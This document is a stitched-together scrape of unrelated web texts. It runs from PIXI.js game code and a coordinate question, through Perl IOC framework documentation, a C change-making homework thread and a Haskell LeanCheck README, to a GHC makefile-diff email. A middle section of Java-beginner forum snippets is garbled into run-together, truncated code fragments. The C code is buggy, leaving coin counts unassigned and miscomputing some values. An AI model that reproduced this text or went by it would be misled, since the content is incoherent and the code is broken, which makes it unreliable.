            .to({y : times * mBlockSize}, 5000)
            .onUpdate(function() {
                mStage.position.y = positionY + this.y;
                console.log("Updating... panning...");
            })
            .onComplete(function() {
                //console.log("Panning finished");
                if(mOnPanFinished) mOnPanFinished();
                removeSegmentFromBottom(times);
                //console.log("Size of play area should be constant : " + mPlayArea.length);
                //console.log("Number of sprite should be constant : " + mStage.children.length);
            })
            .start();
    }

    function getBlock(gridPosition) {
        if((gridPosition.x >= 0 && gridPosition.x < mSize.width) &&
           (gridPosition.y >= 0 && gridPosition.y < mSize.height)) {
            var block = mPlayArea[gridPosition.y][gridPosition.x];
            return (block === undefined)? null : block;
        }
        return null;
    }

    function randomWithinRange(min , max) {
        return Math.floor(Math.random() * (max - min + 1)) + min;
    }

    return This;
}

return {
    create : function(stage, screenSize, viewPort) {
        return World(stage, screenSize, viewPort);
    }
};});

Block.js

define(['pixi'] , function(PIXI){

var Type = {
    None : 0
    , Block1x1 : 1
    , Start : 8
};

function Block(type, size) {
    var mType = type;
    var mSize = size;
    var mIsSolid = false;
    var mIsStartingPosition = false;
    var mIsEndingPosition = false;
    var mBlockSize = size;
    var mGridPosition = {x : 0 , y : 0};
    var mPosition = {x : 0 , y : 0};
    var mSprite = getSpriteFromFrame(type);

    var Class = {
        get sprite(){ return mSprite; }
        , get position(){ return mSprite.position; }
        , set position(position){ mSprite.position = position; }
        , get x(){ return mPosition.x; }
        , set x(x){ mPosition.x = x; if(mSprite !== null) mSprite.x = x; }
        , get y(){ return mPosition.y; }
        , set y(y){ mPosition.y = y; if(mSprite !== null) mSprite.y = y; }
        , get isSolid(){ return mIsSolid; }
        , get type(){ return mType; }
        , get startingPosition(){ return mIsStartingPosition; }
        , get endingPosition(){ return mIsEndingPosition; }
        , get gridPosition(){ return mGridPosition; }
        , set gridPosition(gridPosition){ mGridPosition = gridPosition; }
        , get gx(){ return mGridPosition.x; }
        , get gy(){ return mGridPosition.y; }
        , set gx(x){ mGridPosition.x = x; }
        , set gy(y){ mGridPosition.y = y; }
        , get size(){ return mSize; }
        , getGlobalPosition : getGlobalPosition
        , invalidate : invalidate
    };

    function getGlobalPosition(point) {
        // remove the debug tile afterwards
        return mSprite.toGlobal(point);
    }

    function getSpriteFromFrame(type) {
        var sprite = null;
        switch(type) {
            case Type.None:
                sprite = PIXI.Sprite.fromFrame('sample_tilebg.png');
                mIsSolid = false;
                break;
            case Type.Block1x1:
                sprite = PIXI.Sprite.fromFrame('sample_block.png');
                mIsSolid = true;
                break;
            case Type.Start:
                sprite = PIXI.Sprite.fromFrame('sample_door.png');
                mIsStartingPosition = true;
                mIsSolid = false;
                break;
            default:
                sprite = null;
                mIsSolid = false;
                console.log("Could not identify block type : " + type);
                break;
        }
        return sprite;
    }

    function invalidate(stage) {
        if(stage) stage.removeChild(mSprite);
    }

    return Class;
}

return{
    Type : Type
    , create : function(type, size) {
        return Block(type , size);
    }
};});

I am gonna be so dead tomorrow - Oh no, I think I still got it wrong. I am frustrated; I wanted to get the coordinates of my sprite against the container I created, the one which doesn't pan upwards. toGlobal is returning me wrong values, which, through in-depth debugging, I came to understand the reason for. So I am the one who's wrong. Here is what I need: I have two containers, maincontainer (for the main view and the UI) and subcontainer, which is what I use to pan everything in the game. I inserted a sprite inside subcontainer and I move that container around, but I still need to get the position of the sprite when I view it from maincontainer. Imagine the sprite is at (45,45) because I pan the subcontainer 45 pixels to the right and 45 pixels downwards, but inside subcontainer the sprite's coordinate is still 0x0. This is correct, but when I use the maincontainer as a reference it perceives the coordinate as 45x45. Is there a way for me to do this? If so, how? - I think I got it now! I lacked understanding of local vs global coordinates. I used global and it works pretty well so far, and this is exactly the data I need for the game!
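For anyone hitting the same wall: as long as the containers only translate (no scale or rotation, as in the panning setup above), the conversion being asked for is just the panned container's offset added to the sprite's local position, which is exactly what toGlobal reports in that case. A PIXI-free sketch of the math (the function and variable names here are illustrative, not PIXI API):

```javascript
// Minimal sketch of nested-container coordinate conversion.
// Assumes the containers only translate (no scale/rotation),
// matching the panning setup described in the post.
function toParentSpace(containerOffset, localPoint) {
  // The sprite's coordinates never change inside its own container;
  // seen from the parent, the container's pan offset is added on top.
  return {
    x: containerOffset.x + localPoint.x,
    y: containerOffset.y + localPoint.y
  };
}

// subcontainer panned 45px right and 45px down; sprite at (0,0) locally
var subContainerPos = { x: 45, y: 45 };
var spriteLocal = { x: 0, y: 0 };

var inMain = toParentSpace(subContainerPos, spriteLocal);
console.log(inMain.x + 'x' + inMain.y); // 45x45, as seen from maincontainer
```

With rotation or scale in play this simple addition no longer holds, and the full world transform that toGlobal/toLocal apply is the right tool.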
<!DOCTYPE html>
<html>
  <head>
    <title>Screen Panning Sample</title>
    <script src="core/pixi.js"></script>
  </head>
  <body>
    <script>
      var screenSize = {width : 800 , height : 600 };
      var renderer = PIXI.autoDetectRenderer(screenSize.width, screenSize.height, {});
      var sprite = null;
      var subStage = new PIXI.Container();
      var stage = new PIXI.Container();
      stage.addChild(subStage);

      new PIXI.loaders.Loader()
        .add('res/textures/textures.json')
        .once('complete' , function() {
          sprite = new PIXI.Sprite.fromFrame('0.png');
          sprite.anchor.x = 0.5;
          sprite.anchor.y = 0.5;
          sprite.position.x = screenSize.width / 2;
          sprite.position.y = screenSize.height / 2;
          subStage.addChild(sprite);
          update();
        })
        .load();

      function update() {
        renderer.render(stage);
        subStage.position.y += 0.016667 * 20;
        sprite.x += 0.016667 * 20;

        var glb = sprite.toGlobal(stage.position);
        var act = sprite.position;
        console.log("global coords : " + glb.x + ' ' + glb.y);
        console.log("actual coords : " + act.x + ' ' + act.y);

        requestAnimationFrame(update);
      }

      document.body.appendChild(renderer.view);
    </script>
  </body>
</html>

Thank you!!!
IOC - A lightweight IOC (Inversion of Control) framework

use IOC;

This module provides a lightweight IOC or Inversion of Control framework. Inversion of Control, sometimes called Dependency Injection, is a component management style which aims to clean up component configuration and provide a cleaner, more flexible means of configuring a large application.

My favorite 10-second description of Inversion of Control is, "Inversion of Control is the inverse of Garbage Collection". This comes from Howard Lewis Ship, the creator of the HiveMind IoC Java framework. His point is that just as garbage collection takes care of the destruction of your objects, Inversion of Control takes care of the creation of your objects. However, this does not really explain why IoC is useful; for that you will have to read on.

You may be familiar with a similar style of component management called a Service Locator, in which a global Service Locator object holds instances of components which can be retrieved by key. The common style is to create and configure each component instance and add it into the Service Locator. The main drawback to this approach is the aligning of the dependencies of each component prior to inserting the component into the Service Locator. If your dependency requirements change, then your initialization code must change to accommodate. This can get quite complex when you need to re-arrange initialization ordering and such.

The Inversion of Control style alleviates this problem by taking a different approach. With Inversion of Control, you configure a set of individual Service objects, which know how to initialize their particular components. If these components have dependencies, they will resolve them through the IOC framework itself. This results in a loosely coupled configuration which places no expectation upon initialization order.
If your dependency requirements change, you need only adjust your Service's initialization routine; the ordering will adapt on its own. For links to how other people have explained Inversion of Control, see the "SEE ALSO" section.

Inversion of Control is not for everyone and really is most useful in larger applications. But if you are still wondering if this is for you, then here are a few questions you can ask yourself. If so, you are a likely candidate for IOC.

Singletons can be very useful tools, but when they are overused, they quickly start to take on all the same problems of global variables that they were meant to solve. With the IOC framework, you can reduce several singletons down to one, the IOC::Registry singleton, and allow for more fine-grained control over their life-cycles.

One of the great parts about IOC is that all initialization of dependencies will get resolved through the IOC framework itself. This allows your application to dynamically reconfigure its load order without you having to recode anything but the actual dependency change.

My whole reasoning for creating this module was that I was using a Service Locator object from which I dispensed all my components. This created a lot of delicate initialization code which would frequently cause issues, and since the Service Locator was initialized after all the services were, it was necessary to resolve dependencies between components manually.

The authors of the PicoContainer IoC framework defined 3 types of Dependency Injection: Constructor Injection, Setter Injection and Interface Injection. This framework provides the ability to do all three types within the default classes using a pseudo-type, which I call Block Injection (for lack of a better term). This framework allows a service to be defined by an anonymous subroutine, which gives a large degree of flexibility. However, we also directly support both constructor injection and setter injection.
Interface injection support is on the to-do list, but I feel that interface injection is better suited to more 'type-strict' languages like Java or C# and is really not appropriate to perl. There are a number of benefits and drawbacks to each approach; I will now attempt to list them.

Constructor injection tends to encourage what are called Good Citizen Objects, which are objects that are fully initialized once they are constructed. It is also easy to analyze dependency relationships since the components are stored in the constructor parameters. One drawback to this approach is that it requires the component to be a class, as well as requiring the class to be a Good Citizen. That is okay if you are writing the class, but maybe not when it is a 3rd-party class.

Setter injection has its benefits as well. Since all object initialization is done through setter methods, it allows for a cleaner object design when there are a lot of dependencies, where constructor injection would cause an explosion of parameters in the constructor. Setter injection dependencies can also be easily analyzed programmatically, since the dependencies are stored in the setter parameters. However, as with constructor injection, some of the benefits can also be drawbacks. Sometimes having public setters for initialization is not what you would want normally in your class.

This style is, in my opinion, the most perl-ish approach. It is also, arguably, the simplest approach since it requires very little on the part of the component class, and easily allows for non-object services. It can be used to mix both constructor and setter injection in the same service object. One major drawback is that since the initialization is "hidden" within the anonymous subroutine, it is very difficult to programmatically analyze the dependency relationships.
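The docs are Perl, but the block-injection idea carries over to any language with closures. Here is a hedged sketch in JavaScript (illustrative only; the container and method names below are not the IOC module's API): each service is registered as an anonymous function that receives the container and resolves its own dependencies, so registration order stops mattering.

```javascript
// Illustrative block-injection style container (not the Perl IOC API).
// Each service is an anonymous function handed the container itself,
// from which it pulls whatever dependencies it needs.
function makeContainer() {
  const blocks = {};   // service name -> creation closure
  const cache = {};    // memoized singleton instances
  return {
    register(name, block) { blocks[name] = block; },
    get(name) {
      // Lazily run the block the first time, then reuse the instance,
      // mirroring the singleton behavior of the default IOC::Service.
      if (!(name in cache)) cache[name] = blocks[name](this);
      return cache[name];
    }
  };
}

const c = makeContainer();
// Registration order is irrelevant: 'app' is registered before the
// 'logger' service it depends on, and resolution still works.
c.register('app', (ioc) => ({ log: ioc.get('logger') }));
c.register('logger', () => ({ level: 'info' }));

console.log(c.get('app').log.level); // "info"
```

Skipping the cache in get() would give the prototype-style behavior the docs describe, where a fresh instance is created on every request.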
To give credit where credit is due, this style is not my own invention, but instead was derived from an IoC Ruby implementation in the article mentioned in the "SEE ALSO" section. Yes, I have been using this actively in production for a couple years now, and it has worked without issue. This section will provide a short description of each of the classes in the framework and how they fit within the framework. For more information about each class, please go to the individual classes documentation. This package mostly serves as a namespace placeholder and to load the base framework. This will load IOC::Registry, IOC::Container and IOC::Service. This is a singleton registry which can be used to store and search IOC::Container objects/hierarchies. This package can be used alone or as a base class and be used to proxy service instances. This IOC::Proxy subclass which proxies an object, but only implements a specified interface. This module allows you to configure an IOC::Registry object using XML. Containers classes can hold references to both IOC::Service objects as well as other IOC::Containers. Containers are central to the framework as they provide the means of managing, storing and retrieving IOC::Service objects. This is the base Container object. In most cases, this class will be all you need. This is a subclass of IOC::Container, and adds the ability to retrieve services and sub-containers with a method call syntax, instead of passing a string key to a retrieval method. Service classes are the even more central to the framework since they are what hold and dispense the dependency objects. There are a number of types of service class, all of which are derived at some point from the base IOC::Service class. This is the base Service object. In most cases, this class will be all you need. This extends the IOC::Service object to allow for a constructor injection style. This extends the IOC::Service object to allow for a setter injection style. 
This extends the IOC::Service object to allow for additional parameters to be passed during service creation. Since there is an unbound parameter, these services will work like the prototyped services and return a new instance each time. Most services are singletons, meaning there is only one instance of each service in the system. However, sometimes this is not what you would want, and sometimes you want to set up a prototypical instance of a component and get a new instance each time. This set of Service classes provide just such functionality. NOTE: This is not really the same as prototype-based OO programming, we do not actually create a prototypical instance, but instead we just call the creation routine each time the component is requested. A basic prototype-style Service class. This extends the IOC::Service::Prototype object to allow for a constructor injection style. This extends the IOC::Service::Prototype object to allow for a setter injection style. IOC::Visitor classes are used by other classes in the system to perform various search and traversal functions over a IOC::Container hierarchy. They are mostly for internal use. Given a path, this will attempt to locate a service within a IOC::Container hierarchy. Given a service name, this will attempt to locate a service within a IOC::Container hierarchy by doing a depth first pre-order search. Given a container name, this will attempt to locate a service within a IOC::Container hierarchy by doing a depth first pre-order search. These classes are really just support classes for the framework. Defines a number of exceptions (with Class::Throwable) used in the system. Defines a number of interfaces (with Class::Interfaces) used in the system. Cyclical dependencies now work correctly (for the most part, there are still ways to produce infinite recursion, but most of them could be considered programmer error) but should still be considered an experimental feature. 
This will need to be documented in more detail to explain the gotchas and edge cases.

Currently proxies and cyclical dependencies are not working together. In order to resolve the cyclical dependency issue I need to create an IOC::Service::Deferred instance to defer the service creation with. A proxy should not wrap the deferred instance, but should only wrap the final created instance. Currently this does not happen, so I need to work on it.

The docs are still very rough in many places and I will be filling in details as I go. Of course any suggestions or criticisms of the docs are very welcome and will be gladly received. Help writing them will also be gladly received.

I have plenty of unit tests, and the code is pretty well covered (see "CODE COVERAGE" below). However, what is lacking is some more complex integration tests to really test how all the modules work together. I expect a few such tests to come out of my using the module in my projects, and I will include them when they do. And of course, I am always open to contributions. If you are just experimenting with this module to see if it would work for you, chances are you will create some code which would be great as an integration test. Please, before you throw it away, send it to me; I might be able to use it.

These are things which I have in the back of my head and would someday like to create, but just don't have the time right now. I would like to create some kind of Visitor object which would traverse an IOC::Container hierarchy and analyze the dependencies in it. This is somewhat simple for the ::ConstructorInjection and ::SetterInjection Services since they store the keys to their dependencies inside the object. However, it is more complex with regular IOC::Service objects which utilize the Block Injection pseudo-type. For those, the initialization block would probably need to be run through B::Deparse and the dependency code parsed out.
I hacked out a quick script which created a GraphViz .dot file which visualized the dependency tree. It left much to be desired, but it served as a proof of concept. I would like to expand that idea into a more useful and flexible tool. If anyone is interested in doing this one, contact me and I will send you the proof of concept script.

 --------------------------------------------- ------ ------ ------ ------ ------ ------ ------
 File                                            stmt   bran   cond    sub    pod   time  total
 --------------------------------------------- ------ ------ ------ ------ ------ ------ ------
 IOC.pm                                         100.0    n/a    n/a  100.0    n/a    1.4  100.0
 IOC/Exceptions.pm                              100.0    n/a    n/a  100.0    n/a    7.6  100.0
 IOC/Interfaces.pm                              100.0    n/a    n/a  100.0    n/a    2.5  100.0
 IOC/Registry.pm                                100.0   97.6   66.7  100.0  100.0   12.3   97.4
 IOC/Config/XML.pm                              100.0  100.0   66.7  100.0  100.0    6.1   96.0
 IOC/Config/XML/SAX/Handler.pm                  100.0   92.0   70.0  100.0  100.0   16.7   94.2
 IOC/Proxy.pm                                   100.0   92.3   60.0  100.0  100.0    3.2   97.4
 IOC/Proxy/Interfaces.pm                        100.0  100.0    n/a  100.0    n/a    0.7  100.0
 IOC/Container.pm                               100.0   98.3   91.3  100.0  100.0   23.0   98.9
 IOC/Container/MethodResolution.pm              100.0  100.0    n/a  100.0    n/a    5.6  100.0
 IOC/Service.pm                                  89.4   78.6   66.7   88.5  100.0    7.0   85.7
 IOC/Service/Literal.pm                         100.0  100.0   33.3  100.0  100.0    0.7   96.2
 IOC/Service/Prototype.pm                       100.0  100.0    n/a  100.0  100.0    5.8  100.0
 IOC/Service/ConstructorInjection.pm            100.0  100.0   66.7  100.0  100.0    2.2   93.9
 IOC/Service/SetterInjection.pm                 100.0  100.0   66.7  100.0  100.0    1.5   94.3
 IOC/Service/Prototype/ConstructorInjection.pm  100.0    n/a    n/a  100.0    n/a    0.5  100.0
 IOC/Service/Prototype/SetterInjection.pm       100.0    n/a    n/a  100.0    n/a    0.3  100.0
 IOC/Visitor/SearchForContainer.pm              100.0  100.0   66.7  100.0  100.0    0.5   96.6
 IOC/Visitor/SearchForService.pm                100.0  100.0   66.7  100.0  100.0    0.6   96.8
 IOC/Visitor/ServiceLocator.pm                  100.0  100.0   66.7  100.0  100.0    1.8   97.3
 --------------------------------------------- ------ ------ ------ ------ ------ ------ ------
 Total                                           99.1   94.8   70.3   98.7  100.0  100.0   95.9
 --------------------------------------------- ------ ------ ------ ------ ------ ------ ------

Inversion of Control (or Dependency Injection) is one of the current hot buzzwords in the
Java/Design patterns/C# community right now. However, just because a lot of people are talking about it insufferably does not mean it is still not a good idea. Below are some links I have collected regarding IoC which you might find useful.

Here is a list of some Java IoC frameworks. Spring also has a .NET version. Here is a list of Ruby IoC frameworks. I have only skimmed this site, but it seems that Copland is inspired by HiveMind. I have only skimmed this site, but it seems that Needle is a lightweight version of Copland. Rico is a Ruby port of the Java Pico Framework.

stevan little, <stevan@iinteractive.com>

This library is free software; you can redistribute it and/or modify it under the same terms as Perl itself.
Hello. Please confirm if you still need assistance with this.

Yes, I still need help with this. The website was having problems when I tried to submit it this morning. Hello?

Sorry for that.. I will have this ready soon.

I have some code that mostly works.

#include <stdio.h>

int change(float total, int *quarters, int *dimes, int *nickels, int *pennies);
void print(float total, int quarters, int dimes, int nickels, int pennies);

int main(void)
{
    int quarters, dimes, nickels, pennies;
    float total;

    printf("This program will give the coins required for two fixed values, and one user input value.\n");

    total = 1.88;
    change(total, &quarters, &dimes, &nickels, &pennies); //for the first call to change, calculates for defined value of 1.88
    print(total, quarters, dimes, nickels, pennies);

    total = 0.32;
    change(total, &quarters, &dimes, &nickels, &pennies); //for the second call, calculates for defined value of 0.32

    printf("\nPlease enter an amount of money: "); //This gets the users input for the amount to make change for.
    scanf("%f", &total);
    change(total, &quarters, &dimes, &nickels, &pennies); //calls the function change() to calculate for the user input
    print(total, quarters, dimes, nickels, pennies); //prints the user input values for change

    fflush(stdin); /* clear input area so you can pause */
    printf("Press the key to exit program.");
    getchar(); /* force the computer to pause until you press a key on the keyboard */
    return 0;
}

int change(float total, int *quarters, int *dimes, int *nickels, int *pennies) //declares the variables for the change function
{
    if( total >= 0.25 )
        *quarters = (total / 0.25); //calculates the amount of quarters, and stores it into quarters
    if( total >= 0.10 )
        *dimes = (total - (*quarters * 0.25)) / 0.10; //calculates the amount of dimes, and stores it into dimes
    if( total >= 0.05 )
        *nickels = (total - (*quarters * 0.25) - (*dimes * 0.10)) / 0.05; //calculates the amount of nickels, and stores it into nickels
    if( total >= 0.01 )
        *pennies = (total - (*quarters * 0.25) - (*dimes * 0.10) - (*nickels * 0.05)) / 0.01 + .005; //calculates the amount of pennies, and stores it into pennies
}

void print(float total, int quarters, int dimes, int nickels, int pennies)
{
    printf("\nTOTAL VALUE ENTERED: $%.2f", total);
    printf("\n%3d quarters\n", quarters);
    printf("\n%3d dimes\n", dimes);
    printf("\n%3d nickels\n", nickels);
    printf("\n%3d pennies\n", pennies);
}

I have some code that mostly works. The only thing is that it doesn't work for values below 0.32. What am I doing wrong?

You never answered my question. You didn't send me the link to download it until now.

Yes, I had to turn in my assignment without it though.
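For the record, the usual culprits in code like this are twofold: each coin count is only assigned when its if guard passes, so for totals under 0.25 the quarters variable keeps whatever garbage was in memory, and float arithmetic rounds badly because amounts like 0.29 are not exactly representable. The standard fix is to convert to integer cents once, then use division and remainder. A sketch of that approach, in JavaScript for brevity (the function name is illustrative):

```javascript
// Change-making in integer cents, sidestepping float rounding.
// Rounding once up front turns e.g. 0.29 * 100 = 28.999... into 29 exactly,
// and every count is always assigned, even for tiny totals.
function makeChange(total) {
  let cents = Math.round(total * 100);
  const quarters = Math.floor(cents / 25); cents %= 25;
  const dimes    = Math.floor(cents / 10); cents %= 10;
  const nickels  = Math.floor(cents / 5);  cents %= 5;
  const pennies  = cents;
  return { quarters, dimes, nickels, pennies };
}

console.log(makeChange(0.32)); // { quarters: 1, dimes: 0, nickels: 1, pennies: 2 }
console.log(makeChange(0.04)); // { quarters: 0, dimes: 0, nickels: 0, pennies: 4 }
```

The same structure translates directly back to the C version: compute `int cents = (int)(total * 100 + 0.5);` once, then use `/` and `%` on integers instead of repeated float subtraction.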
java.io.*; class ArrayInput{ public static void main(String args[]) throws IOException { String tmp = "Abc"; byte b[] = tmp.getBytes(); int program help - Java Beginners (String[]args) { int radius,len,wid,choice; Vector myVector=new Vector...); }} public class Figure { private String type; public Figure() { type=""; } public Figure(String n) { type=n; } } public class Circle extends need help. - Java Beginners ;public class ConvetUppercase{ public static void main(String[] args) { Scanner... in lowercase!"); String str = scan.next(); str.substring(0, 97); String str1 Java Array Values to Global Varibles - Java Beginners Java Array Values to Global Varibles I am working on a program... to pass on to the rate and periods variables in the class declarations. Any help... } } public static void main(String args[]) throws IOException i need a quick response about array and string... i need a quick response about array and string... how can i make a dictionary type using array code in java where i will type the word then the meaning will appear..please help me..urgent array - Java Beginners " + maxCount); } public static void main(String [] args){ Scanner input=new array, index, string array, index, string how can i make dictionary using array...please help java help? java help? Write a program, where you first ask values to an array... (send in the array & return the counted value to the main program). Print.../arr.length; return avg; } public static void main(String[] args Array /string based problem.... Array /string based problem.... thanx to help me.but again a problem...("Enter string: "); String[] array = new String[5]; for(int i=0;i<5;i...]+" "); } } static String[] selectionSort(String[] array) { for (int i = 1 string array based problem string array based problem R/sir, firstly thanks to help me so much. but now it can sort string very well but in case of integers... 
string: "); String[] array = new String[5]; for(int i=0;i<5;i++){ array[i string ) " and "public static void main (String args[])" in java but it executes both... "String args[]" can mean a "string array called args which is an array" and the "String[] args" which basically says it?s a "string array called args". Either way array problem java - Java Beginners array problem java PLS HELP ME NOW I NEED YOU RESPONSE IMMDEATLETLY...]; int num; Write Java statements that do the following: a. Call the method..., respectively. another problem.,, 2.)Suppose list is an array of five string string program for String reverse and replace in c,c++,java e.g.Input:10,20,hello output:hello;20;10 Hi Friend, Try the following java...(String[] args) { String array[]=new String[5]; Scanner input Regular Expression Help Help HELP!!!! Regular Expression Help Help HELP!!!! HI all I am very new to java, but i have this problem i got a string e.g Courses['07001'].Title... did that by using this expression String regex = "Courses\[\'[^\']+\'\]\.Title Array in Java Array in Java public class tn { public class State{ String s_name; int p1; int p2; } public void f... } public static void main(String[] args) throws Exception { tn help i need help with this code. write a java code for a method named addSevenToKthElement that takes an integer array, and an integer k as its arguments and returns the kth element plus 7. any help would be greatly Java Dynamic Array - Java Beginners Java Dynamic Array Hi everyone, I have two String arrays, lets say: static String[] locations={"Greece", "Germany", "Italy"}; static String[] projects={"University", "School", "Hospital"}; I want to print with a loop Java Array declaration Java Array declaration In this section you will learn how to declare array in java. As we know an array is collection of single type or similar data type. When an array is created its length is determined. An array can hold fixed Help me please!!! - Java Beginners Help me please!!! 
im badly needing the complete code for this project in java!!! can you please help me???!!! it is about 1-dimensional array in java! it goes something like this. . . "GRADES" Student 1: Student 2 java -netbeans help - Java Beginners java -netbeans help a simple program in netbeans ide to add two...*; import java.awt.event.*; class input{ public static void main(String[] args...(new ActionListener(){ public void actionPerformed(ActionEvent e){ String OOP with Java-Array - Java Beginners OOP with Java-Array Write a program to assign passengers seats...*; public class AirlineReservation { public static void main(String args[]) throws Exception { String[][] seats = new String[7][4 Java programming help - Java Beginners Java programming help Write a program that asks the user...(String[] param) throws IOException{ InputStreamReader m = new InputStreamReader... static void raster(int a, int b, int c){ String result = ""; for(int Rows=1 Pass the array please.. - Java Beginners Pass the array please.. hi! i'm having problem... them in an array. When finished receiving the numbers, the program should pass the array to a method called averageNumbers. This method should average the numbers java program help - Java Beginners java program help sir i just want to clarify one statement that i am... incometax which we have to make a program on java a company has employees who... static void main(String args[]) throws IOException{ BufferedReader bf = new array split string array split string array split string class StringSplitExample { public static void main(String[] args) { String st = "Hello...]); } } } Split String Example in Java static void Main(string[] args java,java,java,help java,java,java,help Dear people, can anyone help me complete this program import java.util.*; public class StringDemo { static String a="{a=100;b...;(str.length); for (String[] array : str){ map.put(array[0], array[1 String Array Java String Array  ... how to make use of string array. 
In the java programming tutorial string, which are widly used in java program for a sequence of character. String Netbeans Array help of rolls possible within the array Help plese! Hi Friend, Try...Netbeans Array help Ok here is my code- * * To change this template... the command line arguments */ public static void main(String[] args) { Random please help me - Java Beginners please help me I have some error in this programe //write acomputer programe using java to generate following series : //output: //1,2,3,0,-2,7,-4..... class Series1HW { public static void main(String args String array sort String array sort Hi here is my code. If i run this code I am... language="java"%> <%@ page session="true"%> <% Connection... result_set=null; String route_number[]=new String[1000]; String Need *Help fixing this - Java Beginners Need *Help fixing this I need to make this program prompt user... and maybe add retrieve function //need help with this one badly. Thanks guys for all the help. import java.text.*; import javax.swing.*; import java.awt.event. ; private String Name; private double Salary; public Person(){ } public Person(int CivilNumber,String Name,double Salary){ this.CivilNumber... CivilNumber){ this.CivilNumber=CivilNumber; } public String getName this in java then try this: import java.util.*; class SquareNumber { public static void main(String[] args) { Scanner input=new Scanner(System.in Create a int array with the help of int buffer. Create a int array with the help of int buffer. In this tutorial, we will see how to create a int array with the help of int buffer. IntBuffer API...[] array() The array() method returns int array based on int buffer
http://www.roseindia.net/tutorialhelp/comment/85744
Here’s how your test.hs might look:

    import Test.Framework
    import Test.Framework.Providers.LeanCheck as LC
    import Data.List

    main :: IO ()
    main = defaultMain tests

    tests :: [Test]
    tests =
      [ LC.testProperty "sort . sort == sort" $
          \xs -> sort (sort xs :: [Int]) == sort xs
      , LC.testProperty "sort == id" -- not really, should fail
          $ \xs -> sort (xs :: [Int]) == xs
      ]

And here is the output for the above program:

    $ ./eg/test
    sort . sort == sort: [OK, passed 100 tests.]
    sort == id: [Failed]
    *** Failed! Falsifiable (after 7 tests):
    [1,0]

             Properties  Total
     Passed  1           1
     Failed  1           1
     Total   2           2

Options

Use -a or --maximum-generated-tests to configure the maximum number of tests for each property.

    $ ./eg/test -a5
    sort . sort == sort: [OK, passed 5 tests.]
    sort == id: [OK, passed 5 tests.]

             Properties  Total
     Passed  2           2
     Failed  0           0
     Total   2           2

Since LeanCheck is enumerative, you may want to increase the default number of tests (100). An arbitrary rule of thumb:

- between 200 and 500 on a developer machine;
- between 1000 and 5000 on CI.

Your mileage may vary.

Further reading

- test-framework-leancheck’s Haddock documentation;
- LeanCheck’s Haddock documentation;
- test-framework’s Haddock documentation;
- LeanCheck’s README;
- test-framework’s official example;
- Tutorial on property-based testing with LeanCheck.
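The enumerative strategy described above — trying every "small" case in a fixed order rather than sampling randomly, which is why the counterexample [1,0] shows up so early — can be imitated in a few lines. The following is a hypothetical Python sketch, not LeanCheck's actual algorithm: the generator bounds and helper names are invented here, and real LeanCheck enumerates values by a more refined notion of size.

```python
from itertools import product

def small_int_lists(max_len, max_val):
    """Enumerate [Int] test cases from smaller to larger, in a fixed order
    (bounds are illustrative; LeanCheck's real enumeration is by 'size')."""
    for n in range(max_len + 1):
        for xs in product(range(max_val + 1), repeat=n):
            yield list(xs)

def holds(prop, max_tests=100):
    """Check prop on the first max_tests cases; return (ok, counterexample)."""
    for i, xs in enumerate(small_int_lists(3, 3)):
        if i >= max_tests:
            return True, None
        if not prop(xs):
            return False, xs
    return True, None

ok, _ = holds(lambda xs: sorted(sorted(xs)) == sorted(xs))
print(ok)  # -> True

bad, cex = holds(lambda xs: sorted(xs) == xs)  # "sort == id", should fail
print(bad, cex)  # -> False [1, 0]
```

Because the enumeration is deterministic and ordered, raising the test budget strictly grows the set of cases tried, which is the motivation for bumping the default test count on CI.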
https://www.stackage.org/nightly-2019-01-07/package/test-framework-leancheck-0.0.1
On 10/01/13 20:44, Simon Marlow wrote: > On 10/01/13 19:24, Ian Lynagh wrote: >> Repository : ssh://darcs.haskell.org//srv/darcs/ghc >> >> On branch : master >> >> >> >> >>> --------------------------------------------------------------- >> >>? Never mind - I see that we still have the .o dependency, the .hs/.lhs dependency was just added. Still, I think an addition to the comments in the file to describe the reasoning would be a good idea (right now the comments don't match the code). Incidentally, the sanity check (hi-rule-helper) increases the time to do a no-op make from 3.3s to 4.9s here. I'm not sure it's worth having on by default, even on non-Windows, because of the impact on interactive development, and if the .hi file doesn't exist, something will go badly wrong very soon anyway. Cheers, Simon > Cheers, > Simon > > >>> --------------------------------------------------------------- >> >> ghc.mk | 4 ---- >> rules/hi-rule.mk | 8 +++++--- >> rules/hs-suffix-rules-srcdir.mk | 2 ++ >> rules/hs-suffix-rules.mk | 3 +++ >> 4 files changed, 10 insertions(+), 7 deletions(-) >> >> diff --git a/ghc.mk b/ghc.mk >> index f4a7a61..d71d8c9 100644 >> --- a/ghc.mk >> +++ b/ghc.mk >> @@ -229,10 +229,6 @@ ifneq "$(CLEANING)" "YES" >> include rules/hs-suffix-rules-srcdir.mk >> include rules/hs-suffix-rules.mk >> include rules/hi-rule.mk >> - >> -$(foreach way,$(ALL_WAYS),\ >> - $(eval $(call hi-rule,$(way)))) >> - >> include rules/c-suffix-rules.mk >> include rules/cmm-suffix-rules.mk >> >> diff --git a/rules/hi-rule.mk b/rules/hi-rule.mk >> index 35baffd..c1e7502 100644 >> --- a/rules/hi-rule.mk >> +++ b/rules/hi-rule.mk >> @@ -62,11 +62,13 @@ >> # documentation). An empty command is enough to get GNU make to think >> # it has updated %.hi, but without actually spawning a shell to do so. 
